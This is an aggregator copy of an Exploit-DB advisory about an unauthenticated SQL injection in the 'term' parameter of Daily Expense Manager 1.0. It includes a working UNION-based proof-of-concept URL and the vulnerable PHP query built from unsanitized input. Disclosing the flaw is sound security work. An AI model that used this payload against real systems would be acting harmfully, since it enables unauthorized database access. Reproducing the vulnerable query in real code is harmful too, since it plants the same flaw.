1

[webapps] Daily Expense Manager 1.0 - 'term' SQLi

 2 weeks ago
source link: https://www.exploit-db.com/exploits/51973
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Daily Expense Manager 1.0 - 'term' SQLi

EDB-ID:

51973

EDB Verified:

Platform:

PHP

Date:

2024-04-08

Vulnerable App:

# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74

## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker 
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.

## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd

## Vulnerable HTTP parameter:
term (GET)

## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-

## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
}
//return json data
echo json_encode($data);
?>

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK